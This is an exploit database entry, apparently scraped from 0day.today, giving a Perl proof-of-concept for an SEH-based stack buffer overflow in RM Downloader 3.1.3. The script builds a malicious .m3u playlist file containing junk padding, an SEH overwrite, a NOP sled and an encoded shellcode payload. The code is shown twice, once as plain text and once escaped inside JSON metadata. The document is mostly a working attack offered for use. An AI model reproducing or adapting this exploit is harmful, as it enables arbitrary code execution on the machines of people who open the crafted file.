ID 1337DAY-ID-13005
Type zdt
Reporter MadjiX
Modified 2010-06-27T00:00:00
Description
Exploit for windows platform in category local exploits
=========================================
RM Downloader 3.1.3 Buffer Overflow (SEH)
=========================================
#!/usr/bin/perl
#RM Downloader 3.1.3 Local stack BOF
#Download : http://www.mini-stream.net/downloads/RMDownloader.exe
#By Madjix Dz8[at]hotmail[dot]com
my $hd = "#EXTM3U\n" ;
my $jnk="\x41" x 43488 ;
my $nseh="\xeb\x06\x90\x90" ;
my $seh="\x16\xBE\x87\x7C" ;
my $nops = "\x90" x 24 ;
my $shellcode= "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
my $pd= "\x90" x 20000 ;
open(MYFILE,'>>MadjiX.m3u');
print MYFILE $hd.$jnk.$nseh.$seh.$nops.$shellcode.$pd;
close(MYFILE);
# 0day.today [2018-02-19] #
{"published": "2010-06-27T00:00:00", "id": "1337DAY-ID-13005", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for windows platform in category local exploits", "enchantments": {"score": {"value": 1.2, "vector": "NONE", "modified": "2018-02-19T23:25:23", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["SUSE_SU-2017-0606-1.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:6E46A05627B4B870228F4C53DD7811AE"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:3125", "SECURITYVULNS:DOC:13005"]}], "modified": "2018-02-19T23:25:23", "rev": 2}, "vulnersScore": 1.2}, "type": "zdt", "lastseen": "2018-02-19T23:25:23", "edition": 2, "title": "RM Downloader 3.1.3 Buffer Overflow (SEH)", "href": "https://0day.today/exploit/description/13005", "modified": "2010-06-27T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/13005", "references": [], "reporter": "MadjiX", "sourceData": "=========================================\r\nRM Downloader 3.1.3 Buffer Overflow (SEH)\r\n=========================================\r\n\r\n\r\n#!/usr/bin/perl\r\n#RM Downloader 3.1.3 Local stack BOF\r\n#Download : http://www.mini-stream.net/downloads/RMDownloader.exe\r\n#By Madjix Dz8[at]hotmail[dot]com\r\nmy $hd = \"#EXTM3U\\n\" ;\r\nmy $jnk=\"\\x41\" x 43488 ;\r\nmy $nseh=\"\\xeb\\x06\\x90\\x90\" ;\r\nmy $seh=\"\\x16\\xBE\\x87\\x7C\" ;\r\nmy $nops = \"\\x90\" x 24 ;\r\nmy $shellcode= \"\\xdb\\xc0\\x31\\xc9\\xbf\\x7c\\x16\\x70\\xcc\\xd9\\x74\\x24\\xf4\\xb1\" .\r\n\"\\x1e\\x58\\x31\\x78\\x18\\x83\\xe8\\xfc\\x03\\x78\\x68\\xf4\\x85\\x30\" .\r\n\"\\x78\\xbc\\x65\\xc9\\x78\\xb6\\x23\\xf5\\xf3\\xb4\\xae\\x7d\\x02\\xaa\" .\r\n\"\\x3a\\x32\\x1c\\xbf\\x62\\xed\\x1d\\x54\\xd5\\x66\\x29\\x21\\xe7\\x96\" .\r\n\"\\x60\\xf5\\x71\\xca\\x06\\x35\\xf5\\x14\\xc7\\x7c\\xfb\\x1b\\x05\\x6b\" .\r\n\"\\xf0\\x27\\xdd\\x48\\xfd\\x22\\x38\\x1b\\xa2\\xe8\\xc3\\xf7\\x3b\\x7a\" .\r\n\"\\xcf\\x4c\\x4f\\x23\\xd3\\x53\\xa4\\x57\\xf7\\xd8\\x3b\\x83\\x8e\\x83\" .\r\n\"\\x1f\\x57\\x53\\x64\\x51\\xa1\\x33\\xcd\\xf5\\xc6\\xf5\\xc1\\x7e\\x98\" .\r\n\"\\xf5\\xaa\\xf1\\x05\\xa8\\x26\\x99\\x3d\\x3b\\xc0\\xd9\\xfe\\x51\\x61\" .\r\n\"\\xb6\\x0e\\x2f\\x85\\x19\\x87\\xb7\\x78\\x2f\\x59\\x90\\x7b\\xd7\\x05\" .\r\n\"\\x7f\\xe8\\x7b\\xca\";\r\nmy $pd= \"\\x90\" x 20000 ;\r\n \r\nopen(MYFILE,'>>MadjiX.m3u');\r\nprint MYFILE $hd.$jnk.$nseh.$seh.$nops.$shellcode.$pd;\r\nclose(MYFILE);\r\n\r\n\n\n# 0day.today [2018-02-19] #"}
{}
